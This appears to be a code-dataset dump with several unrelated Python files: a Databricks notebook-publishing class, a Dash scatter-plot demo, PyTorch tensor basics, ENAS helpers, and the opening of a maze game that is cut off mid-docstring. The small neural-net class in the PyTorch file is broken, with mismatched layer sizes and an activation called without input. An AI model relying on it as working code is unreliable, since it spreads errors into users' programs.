\"str\", found \"{type(source_dir)}\" \"\"\"\n assert type(target_dir) == str, f\"\"\"Expected the parameter \"target_dir\" to be of type \"str\", found \"{type(target_dir)}\" \"\"\"\n\n print(\"-\" * 80)\n print(f\".../{self.path}\")\n\n source_notebook_path = f\"{source_dir}/{self.path}\"\n\n source_info = self.client.workspace().get_status(source_notebook_path)\n language = source_info[\"language\"].lower()\n\n raw_source = self.client.workspace().export_notebook(source_notebook_path)\n\n cmd_delim = self.get_cmd_delim(language)\n commands = raw_source.split(cmd_delim)\n\n md_commands = list()\n\n for i in range(len(commands)):\n command = commands[i].lstrip()\n\n cm = self.get_comment_marker(language)\n if command.startswith(f\"{cm} MAGIC %md\"):\n md_commands.append(command)\n\n if len(md_commands) == 0:\n print(f\"Skipping resource - 0 MD cells: {self.path}\")\n else:\n # self.publish_resource(language, md_commands, resource_root, resource_path)\n self.publish_resource(language, md_commands, target_dir, natural_language)\n\n def load_i18n_source(self, i18n_resources_dir):\n import os\n\n i18n_source_path = f\"/Workspace{i18n_resources_dir}/{self.path}.md\"\n if os.path.exists(i18n_source_path):\n with open(f\"{i18n_source_path}\") as f:\n source = f.read()\n source = source.replace(\"
\\n--i18n-\", \"
--i18n-\")\n source = source.replace(\"
\\n--i18n-\", \"
--i18n-\")\n return source\n\n # i18n_language better be None if the file doesn't exist, or it's in the \"ignored\" round zero or one\n self.warn(lambda: self.i18n_language is None or self.test_round in [0, 1], f\"Resource not found ({self.test_round}): {i18n_source_path}\")\n\n return None\n\n def load_i18n_guid_map(self, i18n_source: str):\n import re\n\n if i18n_source is None:\n return dict()\n\n i18n_guid_map = dict()\n\n # parts = re.split(r\"^
--i18n-\", i18n_source, flags=re.MULTILINE)\n parts = re.split(r\"^
--i18n-|^
--i18n-\", i18n_source, flags=re.MULTILINE)\n\n name = parts[0].strip()[3:]\n self.test(lambda: name == self.path, f\"Expected the notebook \\\"{self.path}\\\" but found\\n \\\"{name}\\\"\")\n\n for part in parts[1:]:\n guid, value = self.parse_guid_and_value(part)\n\n i18n_guid_map[guid] = value\n\n # sandbox_parts = re.split(r\"^
--i18n-\", value, flags=re.MULTILINE)\n # i18n_guid_map[guid] = sandbox_parts[0]\n\n # for sandbox_part in sandbox_parts[1:]:\n # guid, value = self.parse_guid_and_value(sandbox_part)\n # i18n_guid_map[guid] = value\n\n return i18n_guid_map\n\n @staticmethod\n def parse_guid_and_value(part):\n pos = part.find(\"\\n\")\n pos = pos if pos >= 0 else len(part)\n\n guid = f\"--i18n-{part[0:pos]}\".strip()\n value = part[pos+1:]\n\n return guid, value\n\n def publish(self, source_dir: str, target_dir: str, i18n_resources_dir: str, verbose: bool, debugging: bool, other_notebooks: list) -> None:\n assert type(source_dir) == str, f\"\"\"Expected the parameter \"source_dir\" to be of type \"str\", found \"{type(source_dir)}\" \"\"\"\n assert type(target_dir) == str, f\"\"\"Expected the parameter \"target_dir\" to be of type \"str\", found \"{type(target_dir)}\" \"\"\"\n assert type(i18n_resources_dir) == str, f\"\"\"Expected the parameter \"resources_dir\" to be of type \"str\", found \"{type(i18n_resources_dir)}\" \"\"\"\n assert type(verbose) == bool, f\"\"\"Expected the parameter \"verbose\" to be of type \"bool\", found \"{type(verbose)}\" \"\"\"\n assert type(debugging) == bool, f\"\"\"Expected the parameter \"debugging\" to be of type \"bool\", found \"{type(debugging)}\" \"\"\"\n\n assert type(other_notebooks) == list, f\"\"\"Expected the parameter \"other_notebooks\" to be of type \"list\", found \"{type(other_notebooks)}\" \"\"\"\n for i, notebook in enumerate(other_notebooks):\n assert type(other_notebooks[i]) == NotebookDef, f\"\"\"Expected the parameter \"other_notebooks[{i}]\" to be of type \"NotebookDef\", found \"{type(other_notebooks[i])}\" \"\"\"\n\n self.errors = list()\n self.warnings = list()\n self.i18n_guids = list()\n\n print()\n print(\"=\" * 80)\n print(f\".../{self.path}\")\n\n source_notebook_path = f\"{source_dir}/{self.path}\"\n source_info = self.client.workspace().get_status(source_notebook_path)\n language = source_info[\"language\"].lower()\n\n raw_source = self.client.workspace().export_notebook(source_notebook_path)\n\n i18n_source = self.load_i18n_source(i18n_resources_dir)\n i18n_guid_map = self.load_i18n_guid_map(i18n_source)\n\n skipped = 0\n students_commands = []\n solutions_commands = []\n\n cmd_delim = self.get_cmd_delim(language)\n commands = raw_source.split(cmd_delim)\n\n todo_count = 0\n answer_count = 0\n\n include_header = False\n found_header_directive = False\n\n include_footer = False\n found_footer_directive = False\n\n for i in range(len(commands)):\n if debugging:\n print(\"\\n\" + (\"=\" * 80))\n print(f\"Debug Command {i + 1}\")\n\n command = commands[i].lstrip()\n\n self.test(lambda: \"DBTITLE\" not in command, f\"Cmd #{i+1} | Unsupported Cell-Title found\")\n\n # Misc tests for language specific cells\n command = self.test_source_cells(language, command, i)\n\n # Misc tests specific to %md cells along with i18n specific rewrites\n command = self.update_md_cells(language, command, i, i18n_guid_map, other_notebooks)\n\n # Misc tests specific to %run cells\n self.test_run_cells(language, command, i, other_notebooks)\n\n # Misc tests specific to %pip cells\n command = self.test_pip_cells(language, command, i)\n\n # Extract the leading comments and then the directives\n leading_comments = self.get_leading_comments(language, command.strip())\n directives = self.parse_directives(i, leading_comments)\n\n if debugging:\n if len(leading_comments) > 0:\n print(\" |-LEADING COMMENTS --\" + (\"-\" * 57))\n for comment in leading_comments:\n print(\" |\" + comment)\n else:\n print(\" |-NO LEADING COMMENTS --\" + (\"-\" * 54))\n\n if len(directives) > 0:\n print(\" |-DIRECTIVES --\" + (\"-\" * 62))\n for directive in directives:\n print(\" |\" + directive)\n else:\n print(\" |-NO DIRECTIVES --\" + (\"-\" * 59))\n\n # Update flags to indicate if we found the required header and footer directives\n include_header = True if D_INCLUDE_HEADER_TRUE in directives else include_header\n found_header_directive = True if D_INCLUDE_HEADER_TRUE in directives or D_INCLUDE_HEADER_FALSE in directives else found_header_directive\n\n include_footer = True if D_INCLUDE_FOOTER_TRUE in directives else include_footer\n found_footer_directive = True if D_INCLUDE_FOOTER_TRUE in directives or D_INCLUDE_FOOTER_FALSE in directives else found_footer_directive\n\n # Make sure we have one and only one directive in this command (ignoring the header directives)\n directive_count = 0\n for directive in directives:\n if directive not in [D_INCLUDE_HEADER_TRUE, D_INCLUDE_HEADER_FALSE, D_INCLUDE_FOOTER_TRUE, D_INCLUDE_FOOTER_FALSE]:\n directive_count += 1\n self.test(lambda: directive_count <= 1, f\"Cmd #{i+1} | Found multiple directives ({directive_count}): {directives}\")\n\n # Process the various directives\n if command.strip() == \"\":\n skipped += self.skipping(i, \"Empty Cell\")\n elif D_SOURCE_ONLY in directives: skipped += self.skipping(i, None)\n elif D_INCLUDE_HEADER_TRUE in directives: skipped += self.skipping(i, None)\n elif D_INCLUDE_HEADER_FALSE in directives: skipped += self.skipping(i, None)\n elif D_INCLUDE_FOOTER_TRUE in directives: skipped += self.skipping(i, None)\n elif D_INCLUDE_FOOTER_FALSE in directives: skipped += self.skipping(i, None)\n\n elif D_TODO in directives:\n # This is a TO-DO cell, exclude from solution notebooks\n todo_count += 1\n command = self.clean_todo_cell(language, command, i)\n students_commands.append(command)\n\n elif D_ANSWER in directives:\n # This is an ANSWER cell, exclude from lab notebooks\n answer_count += 1\n solutions_commands.append(command)\n\n elif D_DUMMY in directives:\n students_commands.append(command)\n solutions_commands.append(command.replace(\"DUMMY\",\n \"DUMMY: Ya, that wasn't too smart. Then again, this is just a dummy-directive\"))\n\n else:\n # Not a TO-DO or ANSWER, just append to both\n students_commands.append(command)\n solutions_commands.append(command)\n\n # Check the command for BDC markers\n bdc_tokens = [\"IPYTHON_ONLY\", \"DATABRICKS_ONLY\",\n \"AMAZON_ONLY\", \"AZURE_ONLY\", \"TEST\", \"PRIVATE_TEST\", \"INSTRUCTOR_NOTE\", \"INSTRUCTOR_ONLY\",\n \"SCALA_ONLY\", \"PYTHON_ONLY\", \"SQL_ONLY\", \"R_ONLY\"\n \"VIDEO\", \"ILT_ONLY\", \"SELF_PACED_ONLY\", \"INLINE\",\n \"NEW_PART\", \"{dbr}\"]\n\n for token in bdc_tokens:\n self.test(lambda: token not in command, f\"\"\"Cmd #{i+1} | Found the token \"{token}\" \"\"\")\n\n cm = self.get_comment_marker(language)\n if not command.startswith(f\"{cm} MAGIC %md\"):\n if language.lower() == \"python\":\n if \"lang-python\" not in self.ignoring:\n self.warn(lambda: \"%python\" not in command, f\"\"\"Cmd #{i+1} | Found \"%python\" in a Python notebook\"\"\")\n elif language.lower() == \"sql\":\n if \"lang-sql\" not in self.ignoring:\n self.warn(lambda: \"%sql\" not in command, f\"\"\"Cmd #{i+1} | Found \"%sql\" in a SQL notebook\"\"\")\n elif language.lower() == \"scala\":\n if \"lang-scala\" not in self.ignoring:\n self.warn(lambda: \"%scala\" not in command, f\"\"\"Cmd #{i+1} | Found \"%scala\" in a Scala notebook\"\"\")\n elif language.lower() == \"r\":\n # We have to check both cases so as not to catch %run by accident\n if \"lang-r\" not in self.ignoring:\n self.warn(lambda: \"%r \" not in command, f\"\"\"Cmd #{i+1} | Found \"%r\" in an R notebook\"\"\")\n self.warn(lambda: \"%r\\n\" not in command, f\"\"\"Cmd #{i+1} | Found \"%r\" in an R notebook\"\"\")\n else:\n raise Exception(f\"The language {language} is not supported\")\n\n for year in range(2017, 2999):\n tag = f\"{year} Databricks, Inc\"\n self.test(lambda: tag not in command, f\"\"\"Cmd #{i+1} | Found copyright ({tag}) \"\"\")\n\n self.test(lambda: found_header_directive, f\"One of the two header directives ({D_INCLUDE_HEADER_TRUE} or {D_INCLUDE_HEADER_FALSE}) were not found.\")\n self.test(lambda: found_footer_directive, f\"One of the two footer directives ({D_INCLUDE_FOOTER_TRUE} or {D_INCLUDE_FOOTER_FALSE}) were not found.\")\n self.test(lambda: answer_count >= todo_count, f\"Found more {D_TODO} commands ({todo_count}) than {D_ANSWER} commands ({answer_count})\")\n\n if include_header is True:\n students_commands.insert(0, self.get_header_cell(language))\n solutions_commands.insert(0, self.get_header_cell(language))\n\n if include_footer is True:\n students_commands.append(self.get_footer_cell(language))\n solutions_commands.append(self.get_footer_cell(language))\n\n for key in [\"\\\"\", \"*\", \"<\", \">\", \"?\", \"\\\\\", \"|\", \":\"]:\n # Not checking for forward slash as the platform itself enforces this.\n self.warn(lambda: key not in self.path, f\"Found invalid character {key} in notebook name: {self.path}\")\n\n # Create the student's notebooks\n students_notebook_path = f\"{target_dir}/{self.path}\"\n common.print_if(verbose, students_notebook_path)\n common.print_if(verbose, f\"...publishing {len(students_commands)} commands\")\n self.publish_notebook(language, students_commands, students_notebook_path, print_warnings=True)\n\n # Create the solutions notebooks\n if self.include_solution:\n solutions_notebook_path = f\"{target_dir}/Solutions/{self.path}\"\n common.print_if(verbose, solutions_notebook_path)\n common.print_if(verbose, f\"...publishing {len(solutions_commands)} commands\")\n self.publish_notebook(language, solutions_commands, solutions_notebook_path, print_warnings=False)\n\n def publish_resource(self, language: str, md_commands: list, target_dir: str, natural_language: str) -> None:\n import os\n\n m = self.get_comment_marker(language)\n target_path = f\"{target_dir}/{natural_language}/{self.path}\"\n\n final_source = f\"# /{self.path}\\n\"\n\n # Processes all commands except the last\n for md_command in md_commands:\n md_command = md_command.replace(f\"{m} MAGIC \", \"\")\n md_command = md_command.replace(f\"%md-sandbox --i18n-\", f\"
--i18n-\")\n md_command = md_command.replace(f\"%md --i18n-\", f\"
--i18n-\")\n final_source += md_command\n final_source += \"\\n\"\n\n final_source = self.replace_contents(final_source)\n\n target_file = \"/Workspace\"+target_path+\".md\"\n target_dir = \"/\".join(target_file.split(\"/\")[:-1])\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n\n if os.path.exists(target_file):\n os.remove(target_file)\n\n with open(target_file, \"w\") as w:\n w.write(final_source)\n\n def publish_notebook(self, language: str, commands: list, target_path: str, print_warnings: bool) -> None:\n m = self.get_comment_marker(language)\n final_source = f\"{m} Databricks notebook source\\n\"\n\n # Processes all commands except the last\n for command in commands[:-1]:\n final_source += command\n final_source += self.get_cmd_delim(language)\n\n # Process the last command\n m = self.get_comment_marker(language)\n final_source += commands[-1]\n final_source += \"\" if commands[-1].startswith(f\"{m} MAGIC\") else \"\\n\\n\"\n\n final_source = self.replace_contents(final_source)\n\n self.assert_no_errors(print_warnings)\n\n parent_dir = \"/\".join(target_path.split(\"/\")[0:-1])\n self.client.workspace().mkdirs(parent_dir)\n self.client.workspace().import_notebook(language.upper(), target_path, final_source)\n\n def clean_todo_cell(self, source_language, command, i):\n new_command = \"\"\n lines = command.split(\"\\n\")\n source_m = self.get_comment_marker(source_language)\n\n first = 0\n prefix = source_m\n\n for test_a in [\"%r\", \"%md\", \"%sql\", \"%python\", \"%scala\"]:\n test_b = f\"{source_m} MAGIC {test_a}\"\n if len(lines) > 1 and (lines[0].startswith(test_a) or lines[0].startswith(test_b)):\n first = 1\n cell_m = self.get_comment_marker(test_a)\n prefix = f\"{source_m} MAGIC {cell_m}\"\n\n for index in range(len(lines)):\n line = lines[index]\n\n if index == 0 and first == 1:\n # This is the first line, but the first is a magic command\n new_command += line\n\n elif (index == first) and line.strip() not in [f\"{prefix} {D_TODO}\"]:\n self.test(lambda: False, f\"\"\"Cmd #{i + 1} | Expected line #{index + 1} to be the \"{D_TODO}\" directive: \"{line}\" \"\"\")\n\n elif not line.startswith(prefix) and line.strip() != \"\" and line.strip() != f\"{source_m} MAGIC\":\n self.test(lambda: False, f\"\"\"Cmd #{i + 1} | Expected line #{index + 1} to be commented out: \"{line}\" with prefix \"{prefix}\" \"\"\")\n\n elif line.strip().startswith(f\"{prefix} {D_TODO}\"):\n # Add as-is\n new_command += line\n\n elif line.strip() == \"\" or line.strip() == f\"{source_m} MAGIC\":\n # No comment, do not process\n new_command += line\n\n elif line.strip().startswith(f\"{prefix} \"):\n # Remove comment and space\n length = len(prefix) + 1\n new_command += line[length:]\n\n else:\n # Remove just the comment\n length = len(prefix)\n new_command += line[length:]\n\n # Add new line for all but the last line\n if index < len(lines) - 1:\n new_command += \"\\n\"\n\n return new_command\n\n def replace_contents(self, contents: str):\n import re\n\n for key in self.replacements:\n old_value = \"{{\" + key + \"}}\"\n new_value = self.replacements[key]\n contents = contents.replace(old_value, new_value)\n\n # TODO Fix this error after a proper unit tests is created.\n # noinspection RegExpDuplicateCharacterInClass\n mustache_pattern = re.compile(r\"{{[a-zA-Z\\-\\\\_\\\\#\\\\/]*}}\")\n result = mustache_pattern.search(contents)\n if result is not None:\n self.test(lambda: False, f\"A mustache pattern was detected after all replacements were processed: {result}\")\n\n for icon in [\":HINT:\", \":CAUTION:\", \":BESTPRACTICE:\", \":SIDENOTE:\", \":NOTE:\"]:\n if icon in contents:\n self.test(lambda: False, f\"The deprecated {icon} pattern was found after all replacements were processed.\")\n\n # No longer supported\n # replacements[\":HINT:\"] = \"\"\" **Hint:**\"\"\"\n # replacements[\":CAUTION:\"] = \"\"\"\"\"\"\n # replacements[\":BESTPRACTICE:\"] = \"\"\"\"\"\"\n # replacements[\":SIDENOTE:\"] = \"\"\"\"\"\"\n\n return contents\n\n @staticmethod\n def get_comment_marker(language):\n language = language.replace(\"%\", \"\")\n\n if language.lower() in \"python\":\n return \"#\"\n elif language.lower() in \"sql\":\n return \"--\"\n elif language.lower() in \"md\":\n return \"--\"\n elif language.lower() in \"r\":\n return \"#\"\n elif language.lower() in \"scala\":\n return \"//\"\n else:\n raise ValueError(f\"The language {language} is not supported.\")\n\n @staticmethod\n def get_cmd_delim(language):\n marker = NotebookDef.get_comment_marker(language)\n return f\"\\n{marker} COMMAND ----------\\n\"\n\n def get_leading_comments(self, language, command) -> list:\n leading_comments = []\n lines = command.split(\"\\n\")\n\n source_m = self.get_comment_marker(language)\n first_line = lines[0].lower()\n\n if first_line.startswith(f\"{source_m} magic %md\"):\n cell_m = self.get_comment_marker(\"md\")\n elif first_line.startswith(f\"{source_m} magic %sql\"):\n cell_m = self.get_comment_marker(\"sql\")\n elif first_line.startswith(f\"{source_m} magic %python\"):\n cell_m = self.get_comment_marker(\"python\")\n elif first_line.startswith(f\"{source_m} magic %scala\"):\n cell_m = self.get_comment_marker(\"scala\")\n elif first_line.startswith(f\"{source_m} magic %run\"):\n cell_m = source_m # Included to preclude trapping for R language below\n elif first_line.startswith(f\"{source_m} magic %r\"):\n cell_m = self.get_comment_marker(\"r\")\n else:\n cell_m = source_m\n\n for il in range(len(lines)):\n line = lines[il]\n\n # Start by removing any \"source\" prefix\n if line.startswith(f\"{source_m} MAGIC\"):\n length = len(source_m) + 6\n line = line[length:].strip()\n\n elif line.startswith(f\"{source_m} COMMAND\"):\n length = len(source_m) + 8\n line = line[length:].strip()\n\n # Next, if it starts with a magic command, remove it.\n if line.strip().startswith(\"%\"):\n # Remove the magic command from this line\n pos = line.find(\" \")\n if pos == -1:\n line = \"\"\n else:\n line = line[pos:].strip()\n\n # Finally process the refactored-line for any comments.\n if line.strip() == cell_m or line.strip() == \"\":\n # empty comment line, don't break, just ignore\n pass\n\n elif line.strip().startswith(cell_m):\n # append to our list\n comment = line.strip()[len(cell_m):].strip()\n leading_comments.append(comment)\n\n else:\n # All done, this is a non-comment\n return leading_comments\n\n return leading_comments\n\n def parse_directives(self, i, comments):\n import re\n\n directives = list()\n\n for line in comments:\n if line == line.upper():\n # The comment is in all upper case,\n # must be one or more directives\n directive = line.strip()\n mod_directive = re.sub(\"[^-a-zA-Z_]\", \"_\", directive)\n\n if directive in [\"SELECT\", \"FROM\", \"AS\", \"AND\"]:\n pass # not a real directive, but flagged as one because of its SQL syntax\n\n elif directive in [D_TODO, D_ANSWER, D_SOURCE_ONLY,\n D_INCLUDE_HEADER_TRUE, D_INCLUDE_HEADER_FALSE,\n D_INCLUDE_FOOTER_TRUE, D_INCLUDE_FOOTER_FALSE]:\n directives.append(line)\n\n elif \"FILL-IN\" in directive or \"FILL_IN\" in directive:\n pass # Not a directive, just a random chance\n\n elif directive != mod_directive:\n if mod_directive in [f\"__{D_TODO}\", f\"___{D_TODO}\"]:\n self.test(lambda: False, f\"Cmd #{i+1} | Found double-comment of TODO directive\")\n\n # print(f\"Skipping directive: {directive} vs {mod_directive}\")\n pass # Number and symbols are not used in directives\n\n else:\n reslut_a = self.warn(lambda: \" \" not in directive, f\"\"\"Cmd #{i+1} | Whitespace found in directive \"{directive}\": {line}\"\"\")\n reslut_b = self.warn(lambda: \"-\" not in directive, f\"\"\"Cmd #{i+1} | Hyphen found in directive \"{directive}\": {line}\"\"\")\n reslut_c = self.warn(lambda: directive in SUPPORTED_DIRECTIVES, f\"\"\"Cmd #{i+1} | Unsupported directive \"{directive}\", see dbacademy.dbpublish.help_html() for more information.\"\"\")\n if reslut_a and reslut_b and reslut_c:\n directives.append(line)\n\n return directives\n\n @staticmethod\n def skipping(i, label):\n if label:\n print(f\"Cmd #{i+1} | Skipping: {label}\")\n return 1\n\n def get_header_cell(self, language):\n m = self.get_comment_marker(language)\n return f\"\"\"\n {m} MAGIC\n {m} MAGIC %md-sandbox\n {m} MAGIC\n {m} MAGIC
\n {m} MAGIC \"Databricks\n {m} MAGIC
\n \"\"\".strip()\n\n def get_footer_cell(self, language):\n from datetime import date\n\n m = self.get_comment_marker(language)\n return f\"\"\"\n {m} MAGIC %md-sandbox\n {m} MAGIC © {date.today().year} Databricks, Inc. All rights reserved.
\n {m} MAGIC Apache, Apache Spark, Spark and the Spark logo are trademarks of the Apache Software Foundation.
\n {m} MAGIC
\n {m} MAGIC Privacy Policy | Terms of Use | Support\n \"\"\".strip()\n","repo_name":"databricks-academy/dbacademy-courseware","sub_path":"src/dbacademy_courseware/dbpublish/notebook_def_class.py","file_name":"notebook_def_class.py","file_ext":"py","file_size_in_byte":43157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6232632647","text":"#######\n# Here we'll use the mpg.csv dataset to demonstrate\n# how multiple inputs can affect the same graph.\n######\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objs as go\nimport pandas as pd\n\napp = dash.Dash()\n\ndf = pd.read_csv('../data/mpg.csv')\n\nfeatures = df.columns\n\napp.layout = html.Div([\n\n html.Div([\n dcc.Dropdown(\n id='xaxis',\n options=[{'label': i.title(), 'value': i} for i in features],\n value='displacement'\n )\n ],\n style={'width': '48%', 'display': 'inline-block'}),\n\n html.Div([\n dcc.Dropdown(\n id='yaxis',\n options=[{'label': i.title(), 'value': i} for i in features],\n value='acceleration'\n )\n ],style={'width': '48%', 'float': 'right', 'display': 'inline-block'}),\n\n dcc.Graph(id='feature-graphic')\n], style={'padding':10})\n\n@app.callback(\n Output('feature-graphic', 'figure'),\n [Input('xaxis', 'value'),\n Input('yaxis', 'value')])\ndef update_graph(xaxis_name, yaxis_name):\n return {\n 'data': [go.Scatter(\n x=df[xaxis_name],\n y=df[yaxis_name],\n text=df['name'],\n mode='markers',\n marker={\n 'size': 15,\n 'opacity': 0.5,\n 'line': {'width': 0.5, 'color': 'white'}\n }\n )],\n 'layout': go.Layout(\n xaxis={'title': xaxis_name.title()},\n yaxis={'title': yaxis_name.title()},\n margin={'l': 40, 'b': 40, 't': 10, 'r': 0},\n hovermode='closest'\n )\n }\n\nif __name__ == '__main__':\n app.run_server()\n","repo_name":"Pierian-Data/Plotly-Dashboards-with-Dash","sub_path":"2-08-MultipleInputs/callback3.py","file_name":"callback3.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":822,"dataset":"github-code","pt":"81"} +{"seq_id":"2928196386","text":"import torch\nimport torch.nn as nn\n\n\n\nprint(\"Using torch\", torch.__version__ )\n\n#set seed\ntorch.manual_seed(42)\n\n#check for GPU\ngpu_avail = torch.cuda.is_available()\nprint(\"Is the GPU available? %s\" % str(gpu_avail))\n\n# set device\ndevice = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\nprint(\"Device\", device)\n\n## create tensor\ntensor = torch.Tensor(2,3,4)\nprint(tensor)\n\none_array = torch.ones(2,3,4)\nprint(\"one array:\\n\",one_array)\n\nzeros_array = torch.zeros(2,3,4)\nprint(\"zeros array:\\n\",zeros_array)\n\nrand_array = torch.rand(2,3,4)\nprint(\"rand_array:\\n\",rand_array)\n\nrandn_array = torch.randn( 2,3,4)\nprint(\"randn:\\n\",randn_array)\n\narange_array = torch.arange(20, dtype=torch.int8, device='cpu')\nprint(\"arange: \\n\", arange_array)\n\n# tensor to numpy\npt_to_numpy = tensor.numpy()\nprint( \"tensor to numpy:\\n\", pt_to_numpy)\n\n# numpy to pytorch\nnumpy_to_pt = torch.from_numpy(pt_to_numpy)\nprint(\"numpy to tensor: \", numpy_to_pt)\n\n# reshape\nreshaped = arange_array.view(-1,5)\nprint(\"reshaped:\\n\", reshaped)\n\n# transpose\ntranspose = reshaped.permute(1,0)\nprint( \"transose:\\n\", transpose)\n\n\n# simple nn\nclass NN( nn.Module):\n def __init__(self, num_inputs, hidden_layer, num_outputs) -> None:\n super().__init__()\n self.l1 = nn.Linear( num_inputs, hidden_layer)\n self.actf = nn.ReLU()\n self.l2 = nn.Linear( num_inputs, hidden_layer)\n self.output = nn.Linear(num_outputs, hidden_layer)\n\n def forward(self, x):\n x = self.l1(x) \n x = self.actf(x)\n x = self.l2(x)\n x = self.actf()\n x = self.output(x)\n return x\n\nmodel = NN(2, 4, 1)\nprint(model)\n\nfor name, param in model.named_parameters():\n print(\"Parameter %s, shape %s\" % (name, str(param.shape)))\n\n","repo_name":"ds-praveenkumar/algorithm-from-scratch","sub_path":"deep-learning/neural_networks/pytorch.py","file_name":"pytorch.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25718575615","text":"import collections\nfrom collections import defaultdict\n\nimport numpy as np\nimport torch\n\nNode = collections.namedtuple('Node', ['id', 'name'])\n\n\nclass keydefaultdict(defaultdict):\n def __missing__(self, key):\n if self.default_factory is None:\n raise KeyError(key)\n else:\n ret = self[key] = self.default_factory(key)\n return ret\n\n\ndef get_variable(inputs, cuda=False, **kwargs):\n if type(inputs) in [list, np.ndarray]:\n inputs = torch.Tensor(inputs)\n if cuda:\n out = torch.Tensor(inputs.cuda(), **kwargs)\n else:\n out = torch.Tensor(inputs, **kwargs)\n return out\n","repo_name":"Sunshine-Ye/Beta-DARTS","sub_path":"optimizers/enas/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"81"} +{"seq_id":"72640172745","text":"minimum = 1\nmaximum = 100\nattempts = 0\n\nwhile attempts <3:\n number = int(input(\"input a number between 1 to 100: \"))\n if minimum <= number <= maximum:\n print(\"you enter a correct number\") \n break\n else:\n print(\"try again!\")\n \n attempts += 1\nif attempts == 3:\n print(\"None\")","repo_name":"rej23/python","sub_path":"getInt.py","file_name":"getInt.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37827834059","text":"\"\"\"\nAuthor SID: 500611960\nDate: 20/05/2020\nIT1110 Assessment Task - Acorn\n\"\"\"\n\nfrom game_parser import read_lines\nfrom grid import grid_to_string\nfrom player import Player\nfrom cells import *\nimport sys\n\n\n\nclass Game:\n \"\"\" Game class contains game function related booleans , \\\n creates a player and grid instance, keeps track of total moves\"\"\"\n def __init__(self, filename):\n self.exit = False\n self.filename = filename\n self.Player1 = Player()\n self.grid = read_lines(self.filename)\n self.success = False\n self.failure = False\n self.teleport = False\n self.total_moves = []\n self.total_moves_count = 0 \n self.oob = False\n self.incorrect_input = False\n self.e_count = 0\n\n\n def get_start_coordinate(self, grid, player):\n \"\"\" Searches parsed grid for the Start() instance coordinates, \\\n updates player.row and player.col\n \n Arguements:\n grid -- list of lists of cell Class instances\n player -- player Class instance\n\n Returns:\n Player coordinates -- list of 2 integers e.g. [1,3]\n \n \"\"\"\n starting_col = 0\n starting_row = 0\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n if \"Start\" in str(grid[i][j]):\n starting_col = i\n starting_row = j\n player.col = starting_col\n player.row = starting_row\n player_coordinates = [starting_col,starting_row]\n return player_coordinates\n\n\n\n\n def display_success_metrics(self, game):\n \"\"\" Displays total moves\\\n and victory message upon saving the Fire nation, exits game\n \n Arguement:\n Game() instance\n\n Prints:\n Success message with game statistics (moves and move count)\n \n Exits game\n\n \"\"\"\n print()\n print(\"You conquer the treacherous maze set up by the Fire Nation\\\n and reclaim the Honourable Furious Forest Throne, restoring your hometown\\\n back to its former glory of rainbow and sunshine! Peace reigns over the lands.\")\n print()\n if game.total_moves_count == 1:\n print(\"You made {} move.\".format(game.total_moves_count))\n else:\n print(\"You made {} moves.\".format(game.total_moves_count))\n if game.total_moves_count == 1:\n print(\"Your move: {}\".format(''.join(game.total_moves)))\n else:\n print(\"Your moves: {}\".format(', '.join(game.total_moves)))\n print()\n print(\"=====================\")\n print(\"====== YOU WIN! =====\")\n print(\"=====================\")\n sys.exit()\n\n\n\n def display_failure_metrics(self, game):\n \"\"\" Displays total moves and failure message\\\n upon losing to the Fire nation, exits game\n \n Arguement:\n Game() instance\n\n Prints:\n Failure message with game statistics (moves and move count)\n \n Exits game\n\n \"\"\"\n\n print(\"\\nYou step into the fires and watch your\\\n dreams disappear :(.\\n\\\n\\nThe Fire Nation triumphs! The Honourable Furious Forest is \\\nreduced to a pile of ash and is scattered to the winds by\\\n the next storm... You have been roasted.\")\n print()\n if game.total_moves_count <2:\n print(\"You made {} move.\".format(game.total_moves_count))\n else:\n print(\"You made {} moves.\".format(game.total_moves_count))\n if game.total_moves_count < 2:\n print(\"Your move: {}\".format(''.join(game.total_moves)))\n else:\n print(\"Your moves: {}\".format(', '.join(game.total_moves)))\n print()\n print(\"=====================\")\n print(\"===== GAME OVER =====\")\n print(\"=====================\")\n sys.exit()\n\n\n def check_cell_interaction(self, coordinates, move):\n \"\"\"Checks if a move can be performed by the player.\n Takes new coordinates from game_move and move string from user input\n Runs step() function on destination cell,\n which returns boolean as to whether move can be performed.\n and performs step function for water and fire cells\n if coordinates are a special cell (end, tele, water or fire), \n stores cells to be permenantly changed on the grid in Player1.\n \n Arguements:\n coordinates -- single list of two integers\n move -- string containing 'w' 'a' 's' 'd' 'e' 'q' / or invalid input \n \n Returns:\n boolean: True or False if player can move to new cell\n\n \"\"\"\n #check if new coordinates are valid\n self.coordinates = coordinates\n self.teleport = False\n row = coordinates[1] \n column = coordinates[0]\n is_valid_move = self.grid[column][row].step(self)\n\n #Check if a special cell is encountered - perform special function\n if \"End\" in str(self.grid[column][row]):\n self.success = True\n\n elif \"Water\" in str(self.grid[column][row]):\n self.Player1.change_coordinates.append([coordinates])\n self.Player1.grid_changes = True\n \n elif \"Fire\" in str(self.grid[column][row]) and self.Player1.num_water_buckets == 0:\n self.failure = True\n elif \"Fire\" in str(self.grid[column][row]) and self.Player1.num_water_buckets > 0:\n self.Player1.num_water_buckets -= 1\n self.Player1.change_coordinates.append([coordinates])\n self.Player1.grid_changes = True\n\n elif \"Teleport\" in str(self.grid[column][row]): \n for i in range(len(self.grid)):\n for j in range(len(self.grid[i])):\n if \"Teleport\" in str(self.grid[i][j]):\n if self.grid[i][j] != self.grid[column][row]:\n if self.grid[i][j].teleporter_number == self.grid[column][row].teleporter_number:\n self.Player1.col = i\n self.Player1.row = j\n self.teleport = True\n return is_valid_move\n\n return is_valid_move\n\n\n\n\n def game_move(self, move):\n \"\"\" Creates a new_coordinate based on player coordinates + user input, \n returns new coordinates and updates game boolean values \n if input invalid or results in player out of bounds (oob).\n These boolean values will be used in check_cell_interactions 